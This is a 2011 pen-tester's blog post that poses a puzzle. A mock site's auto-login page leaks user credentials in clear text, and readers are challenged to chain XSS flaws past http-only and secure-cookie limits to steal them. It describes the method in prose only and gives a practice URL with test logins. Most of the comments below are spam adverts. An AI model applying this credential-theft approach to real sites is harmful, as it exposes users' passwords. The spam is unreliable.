Monday, February 7, 2011

Tricky exploit - a penetration test puzzle



In a recent application security audit for a web-site I came across a big, blaring breach.
while it's always fun to find a good vulnerability, it turned out to be quite tricky to actually exploit it. The trickiness was not due to good security practices but to pure (un)luck (depending on whose point of view). It seemed every angle I tried was off by just a tiny bit.

Eventually I managed to find an interesting multiphase exploit vector, and I think it makes for some interesting tinkering/reading.  I've created a mock-up replica of the vulnerable web-site to allow for testing and analysis. After reading the introductory section about the vulnerability, you may wish to try your wit against the mock-site and find it yourself, before reading on to the detailed exploit write-up.





The Target Site
This was your ordinary small company site.
It had 3 sub-systems:
1. a public site, available to any user.
2. a client site, requiring a login.
3. a printing system, requiring its own login.

After login to the client site, the user was shown a menu that contained a link to the printing system. In order to facilitate the user, the link to the printing system from the menu would try to use the previously given credentials from the client login and pass them on to the printing system for authentication. A poor man's SSO so to speak.



The Breach
It turned out that this "facilitating" method would pull the user credentials and post them to the printing system unencrypted via a client-side redirect!

Initially the user supplies the login credentials to the client site (login.php).
If successful, a menu is presented (menu.php).
A click on the "Go to Printing" link directs the browser to an intermediate page (printAutoLogin.php) that contained the user credentials in a pre-filled form that is immediately  auto-submitted to the printing system login page (printSystem.php) which checks them for validity.

 Click image to enlarge

Figure 1. Client side SSO. First redirect fetches user credentials and passes them to Print System.


The breach is crucial and apparent: the URL printAutoLogin.php returns the current user's name and password in clear text! This information is of course very valuable to the attacker. The only question remaining is, how can he get it??



Exploitation Problems
Finding a breach is one thing. Showing a functional proof-of-concept attack exploiting it is sometimes quite another. While the breach is what the client actually pays for, it is the exploit that gets his respect and admiration. Usually getting a working exploit takes some dull, dirty work of fitting loose ends in place, but in this case it turned out to be an interesting puzzle.

What I wanted to do was leverage an XSS vulnerability I had found in the site to get the user credentials. One way to do this would be to obtain the session cookie and use it to access the tell-tale URL impersonating the legitimate user and obtaining his credentials (assuming no IP checks are done). The cookie was set http-only which made this vector harder.

Another option was to get the credentials on the client side (using an xmlhttprequest) and have them sent directly. This would overcome the http-only problem, and would also be much cooler...


In practice XSS flaws were abundant. I found several around the site, but they were all just a bit off. Two were in different sub-domains, so they didn't have the session cookie set, and were prohibited from making cross-(sub)-domain xmlhttp calls. Another XSS was actually in the same sub-domain but used HTTP whereas the rest of the site was in HTTPS, so again no cookie (it was secure) and no cross-protocol calls.

Close but no cigar. Yet.



Playground version
Before I continue describing the exploitation method I found, I offer you the chance to play around and find it yourself: I've recreated the relevant parts into a simplified mock-website that you can play around with.

The website home page is: http://www.g1.playground.quaji.com/
Valid user credentials are : Name:user123 Password:pass123

You are welcome to stop reading and try your wit against it.
Note that this is not an armchair pen-test riddle. You'll have to get your proxies dirty to find some relevant details that I didn't describe yet to figure it out.

Your goal is to find and craft an XSS payload that will cause the user credentials to be sent to the attacker (an alert box with the info would do).




Feel free to leave your comments.
Please post only non-spoiler comments here, and the rest on the solution entry.


Solution
The detailed exploitation is provided in a separate blog entry.

48 comments:

  1. Thank you for sharing, it's a very nice situation and setup. I'll play with it soon.

    ReplyDelete
  2. Awesome! Congratulations!

    ReplyDelete
  3. Yes, How attacker creates "XSS PAYLOAD 2" is not so clear & it only works with PHPSESSID=1337.
    Please explain how XSS Payload 2 is added to printAutoLogin.php's password field.

    ReplyDelete
  4. Wholesale Sexy Lingerie,High Quality!Low Price! Wholesale Leggings,Plus Size Corsets,Wholesale Halloween Costumes From China Suppliers LingeriePark.Wholesale Only,No Retail!Lingerie China Suppliers
    LingeriePark
    Wholesale Sexy Lingerie
    Low Price Lingerie
    Lingerie China

    ReplyDelete
  5. I am really enjoying reading your well written articles. http://awriter.org/ultiuscom/
    I think you spend numerous effort and time updating your site. I have bookmarked it and I am taking a look ahead to reading new articles.

    ReplyDelete
  6. Thank you for sharing such a informative post with us, it will beneficial for everyone, It is one of the best sites that I have visited. I am looking forward to read more blogs post from here
    Assignment Help UAE

    ReplyDelete
  7. Thank you for sharing valuable information. Nice post. I enjoyed reading this post. Child Homeopathy Doctor in Jaipur

    ReplyDelete
  8. This is a really super post. Must admit that you are amid the best writer I have read. I appreciate your making the effort to discuss this class of article. Best Homeopathy Doctor in Jaipur

    ReplyDelete
  9. Union advances are conceivable choices to contracting regularly scheduled installments and still assume liability for the obligation.Payday Loans San-diego

    ReplyDelete
  10. In any case, you should know about what you are consenting to and design the reimbursement date so you don't get yourself assist behind.Cash Advance

    ReplyDelete
  11. Thank you for taking the time and sharing this information with us. It was indeed very helpful and insightful while being straight forward and to the point.
    world no 1 assignment help company

    ReplyDelete
  12. Bookmarked your fantastic website. Fabulous work, unique way with words! For more info: Dubai Film Production Companies Corporate Video Production Dubai

    ReplyDelete
  13. It is obligatory, by and large, for the borrower to have a financial records with coordinate store of their paycheck as that is the manner by which the moneylender gets credit installments from the borrower.
    Payday Loans San-diego

    Cash Advance Chicago
    Auto Title Loans Chicago
    Cash AdvancePayday Loans

    ReplyDelete
  14. This most recent pattern offers enormous accommodation to the clients. Check getting the money for machines are an other option to the conventional method for benefit in that they can be found in an assortment of areas and can be utilized specifically by the clients themselves with no help. check cashing san diego

    ReplyDelete
  15. This consistently expanding development is on account of conventional bank credits are not taking care of the requests of entrepreneurs. Cash Advances Chicago

    ReplyDelete
  16. Very interesting blog. Lot of blogs I see these days don’t really provide anything that I’m interested in, but I’m most definitely interested in this one. Thanks a lot for this share!! best essay writing service

    ReplyDelete
  17. Programming Assignment help
    If you are still in a dilemma, you could ask your teacher for some guidance, or you can take Assignment helpfrom different assignment writing service providers. There you can find many online experts, who are all set to help you in your assignment. The proper outline followed by them will give you an idea of how to make your assignment look more presentable and attractive.

    ReplyDelete
  18. Nice post. I was checking continuously this weblog and I am impressed! Extremely helpful information specially the remaining phase ?? I deal with such information a lot. I was seeking this certain info for a very lengthy time. Thank you and best of luck.Kryptowaluty , sprawdz rowniez kursy kryptowalut

    ReplyDelete
  19. I am an academic assignment services provider and Academic Write, associated with sampleassignment.com since the decade. Sample Assignment is leading plagiarism free assignment help Brisbane Australia, UK, USA. We provide online conflict online assignment help customized assignment help service. We are leading the market for more than a decade now and have acquired the name of being the best academic help service for our comprehensive services at pocket-friendly rates online supply chain online assignment help and We also serve our Service to those who search assignment help Perth.

    ReplyDelete
  20. Thanks for your informative content. It's extremely useful to students for further research and assistance. However, there is an academic assignment help provider that goes by the name TutorVersal, who has been offering various assignment writing services like Essay Help services, report writing services, case study services et cetera. The company has delivered thousands of assignments in which students scored high-distinction grades. They have never let any student down and in addition, offers various essay writing help services in subjects like management, nursing, law, engineering, and more. They constantly strive to provide the best academic solutions at the cheapest price as they know how difficult it is for a student to manage such expenses. Thus, any students who feel helpless in their academic assignments can avail prime assignments services at Tutorversal.com.

    ReplyDelete
  21. Hey, do check out our Cryptography assignment help provided by the subject experts at TutorVersal. We are an online assignment help provider who assists students in overcoming their assignment writing challenges. Our highly qualified team of academic helpers write quality assignments that are 100% plagiarism-free and deliver them right on time. Recently, we launched child care assignment help service, and it has got a favorable response from hundreds of students in Australia who used it. We provide assignment solutions for over 180 subjects such as management, economics, nursing, engineering, and more. You can easily get your essays, dissertations, and case study assignments solved by us and score excellent grades in them!

    ReplyDelete
  22. Thank you for making me understand about how an expert assist student with Nursing assignment help by going through many writing formats of assignments such as essays, reports, thesis, articles and many more. Likewise, there exist one such company as Online Assignment Expert that provides top quality assignments at affordable prices. We at Online assignment Expert provide world class feature of on-time assignment delivery, plagiarism check, partial payment, unlimited revisions, etc. You can contact our team of highly professional and experienced experts engaged in their respective field. Avail our exclusive discounts on our nursing case study assignment help by contacting our experts at Online Assignment Expert.

    ReplyDelete
  23. This is a highly informative article! Our MATLAB assignment help experts also work towards one goal, i.e., allowing students to overcome their assignment writing challenges. TutorVersal is an online assignment service provider who assists students in completing their MATLAB assessments and even score excellent grades in these writing tasks. One of the major challenges that most computer science students face today is the complexity of their assignment’s guidelines and requirements, which may be beyond their level of understanding. But with our academic guidance, they do not have to worry about such an issue. Every team, including our bioinformatics assignment help experts, ensure that students get a properly-written assignment, which is exactly as per their guidelines and marking rubric. We also guarantee maximum customer satisfaction and timely-delivery of their work.

    ReplyDelete
  24. Hello. Thank you for the informative content that you have provided. However, I would like to recommended highly professional assignment help services that are being offered by My Assignment Help Oz. Few years back, me and my friend needed ‘my assignment help Australia’ and were having no luck with assignment requirements and structures.
    That is when, some of my friends recommended me about MAHOZ and how premium their assignment help services are.
    We chose their help my assignment services and ended up scoring more than 95% in our final academic grades.
    They turned out to be the real saviors for us.

    ReplyDelete
  25. All the students who are looking for a case study assignment help, please pay attention. My Assignment Services is a destination that thousands of students turn to when they are in need of an expert consultation. The team of experts delivering assignment help to the students are either master’s degree holders of have PhD doctorate. Therefore, every assignment that we have ever written is of supreme quality and international standard for global competition. Students who are searching for companies with “who can do my assignment for me”, My Assignment Services is your destination. We have an expertise when it comes to writing original and unique answers and deliver the work under strict deadline on time. The case study assignment help with us is a service prepared keeping in mind the needs of the students. An affordable assignment help from best experts is now available!

    ReplyDelete